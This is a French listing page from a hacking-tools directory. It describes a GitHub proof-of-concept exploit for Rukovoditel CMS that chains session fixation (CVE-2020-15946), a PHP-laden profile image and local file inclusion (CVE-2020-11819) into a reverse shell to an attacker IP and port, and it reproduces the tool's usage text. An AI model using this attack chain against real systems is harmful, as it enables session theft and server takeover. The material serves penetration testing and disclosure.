Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
PoC-RCE-Rukovoditel — Preuve de concept pour CVE-2020-11819 et CVE-2020-15946 | Kitploit
Outils/GitHubGitHub/danyx07/poc-rce-rukovoditel
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'Intrusion
GitHubdanyx07/poc-rce-rukovoditel

PoC-RCE-Rukovoditel

Preuve de concept pour CVE-2020-11819 et CVE-2020-15946

Voir le dépôt
il y a 5 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

PoC-RCE-Rukovoditel

Preuve de concept pour CVE-2020-11819 et CVE-2020-15946. Testé sur Rukovoditel 2.4.x, 2.5.x et 2.6.1

Description:

Cet exploit a deux modes d'exécution, en utilisant la vulnérabilité de fixation de session (CVE-2020-15946) ou en utilisant les identifiants d'accès de n'importe quel compte sous n'importe quel profil. Avec l'option --type L, ce script créera un lien malveillant. Si la victime accède au lien dans un navigateur, un identifiant de session arbitraire sera défini, qui sera utilisé pour voler sa session après avoir téléchargé une image avec du contenu PHP sur son profil photo, puis en utilisant l'inclusion de fichier local (CVE-2020-11819) pour obtenir un joli reverse shell ou, avec les options --type C -u -p , vous pouvez fournir des identifiants, charger l'image avec du contenu PHP et utiliser l'inclusion de fichier local (CVE-2020-11819) pour exécuter du code.

Protip : n'oubliez pas de vérifier si le module d'enregistrement est activé ;)

Utilisation

exploit.py -t -a L --ip attacker IP --port attacker port [options] exploit.py -t -a C -u -p --ip attacker IP --port attacker port [options]

RCE post-authentification pour rukovoditel, version 1.0 du script

arguments optionnels : -h, --help affiche ce message d'aide et quitte -t URL, --target URL URL/Chemin complet vers le CMS Rukovoditel http://url/path/to/cms/ -u USER, --user USER Nom d'utilisateur pour l'authentification -p PASSWORD, --password PASSWORD Mot de passe pour l'authentification -a TYPE, --type TYPE Utilisez -a L pour générer le lien et voler la session ou -a C si vous avez des identifiants d'accès à l'application web --ip IP_ATTACKER IP de l'attaquant pour le reverse shell ! --port PORT_ATTACKER Port pour la connexion reverse shell --proxy PROXY Configure un proxy HTTP pour le débogage http://127.0.0.1:8080

Télécharger l’outil